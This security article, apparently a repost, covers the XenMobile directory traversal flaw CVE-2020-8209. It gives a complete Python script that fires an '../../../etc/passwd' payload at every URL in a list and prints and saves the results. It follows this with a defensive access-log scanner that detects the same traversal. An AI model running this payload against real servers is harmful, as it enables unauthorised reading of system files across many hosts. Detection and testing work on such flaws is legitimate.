Citrix XenMobile Directory Traversal (CVE-2020-8209) Batch Detection Script


Usage & Disclaimer

This script is a batch detection script for the Citrix XenMobile directory traversal vulnerability (CVE-2020-8209).

Usage: python CVE-2020-8209-Multiple.py url.txt

Addresses found to be vulnerable are written to vul.txt.

Affected versions:
  • Citrix XenMobile Server 10.12 before RP2
  • Citrix XenMobile Server 10.11 before RP4
  • Citrix XenMobile Server 10.10 before RP6
  • Citrix XenMobile Server 10.9 before RP5

This tool is intended solely for security testing by security personnel; any direct or indirect consequences or losses caused by unauthorized testing are the sole responsibility of the user.


#!/usr/bin/env python
# coding:utf-8
# author:B1anda0
import sys
import requests
from colorama import init
init(autoreset=True)

# The original ASCII-art banner did not survive extraction (its backslashes were lost),
# so a plain heading stands in for it here; the colour code is the author's.
banner = '\033[1;33;40mCVE-2020-8209 - Citrix XenMobile directory traversal batch check'

def XenMobile(urls):
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
    payload = '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
    poc = urls + payload
    try:
        requests.packages.urllib3.disable_warnings()  # suppress InsecureRequestWarning
        response = requests.get(poc, headers=headers, timeout=10, verify=False)
        # response.text is str; the original tested "root" against response.content (bytes),
        # which raises TypeError on Python 3 and was silently swallowed by the bare except.
        if response.status_code == 200 and "root" in response.text:
            print(u'\033[1;31;40m[+]{} is citrix xenmobile directory traversal vulnerability'.format(urls))
            print(response.text)
            # Append the vulnerable address to vul.txt
            with open('./vul.txt', 'a') as f:
                f.write(urls)
                f.write('\n')
        else:
            print('\033[1;32;40m[-]{} None'.format(urls))
    except requests.RequestException:
        print('{} request timeout'.format(urls))

if __name__ == '__main__':
    print(banner)
    if len(sys.argv) != 2:
        print('Example:python CVE-2020-8209.py url.txt')
    else:
        with open(sys.argv[1]) as file:
            for url in file.readlines():
                urls = url.strip()
                if not urls:
                    continue  # skip blank lines in url.txt
                if urls[-1] == '/':
                    urls = urls[:-1]
                XenMobile(urls)
        print('Check Over')
Project URL: https://github.com/B1anda0/CVE-2020-8209/blob/main/CVE-2020-8209-Multiple.py
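From the defender's side, the request the script above sends is exactly what a scan of a XenMobile server leaves in the web server's access log: a GET to /jsp/help-sb-download.jsp whose sbFileName parameter climbs out of its directory. The following is an added example, not part of the original post or of the B1anda0 repository, that scans access-log lines for that pattern. It generalizes beyond the one payload on the page by also catching percent-encoded and double-encoded traversal sequences and backslash separators. The combined-log-format layout is an assumption, and the log lines and IP addresses are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter taken from the page's payload.
VULN_ENDPOINT = "/jsp/help-sb-download.jsp"
FILE_PARAM = "sbFileName"

# Combined log format (assumed): ip ident user [time] "METHOD target HTTP/x" status size ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access-log lines; none of this is real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Aug/2020:10:01:02 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Aug/2020:10:01:03 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Aug/2020:10:02:10 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=UserGuide.pdf HTTP/1.1" 200 52011 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Aug/2020:10:03:00 +0000] "GET /jsp/index.jsp HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded sequences such as ..%252F are seen as ../ too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(file_name):
    """True when the decoded file name escapes its directory: it contains a
    '..' path segment (with / or \\ separators) or is an absolute path."""
    decoded = decode_fully(file_name).replace("\\", "/")
    if decoded.startswith("/"):
        return True
    return any(segment == ".." for segment in decoded.split("/"))


def find_traversal_attempts(log_text):
    """Return one record per logged request to the vulnerable endpoint whose
    sbFileName value is a traversal attempt. Status 200 on such a hit means
    the server most likely served the file."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        parts = urlsplit(m.group("target"))
        if parts.path != VULN_ENDPOINT:
            continue
        # parse_qs percent-decodes once; decode_fully handles any further layers.
        for value in parse_qs(parts.query, keep_blank_values=True).get(FILE_PARAM, []):
            if is_traversal(value):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": int(m.group("status")),
                    "file": decode_fully(value),
                    "raw": m.group("target"),
                })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print("[!] {ip} at {time}: {file} (HTTP {status}) <- {raw}".format(**hit))
```

Two of the four sample lines are flagged, both from the same source address, and both with HTTP 200, which is the combination that should page an on-call analyst: a traversal request that the server answered successfully. Running the same function over a real log requires only that the lines match the assumed combined format; adjust REQUEST_RE for other layouts.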


This article was first published on the WeChat public account (Ots Security): Citrix XenMobile Directory Traversal (CVE-2020-8209) Batch Detection Script
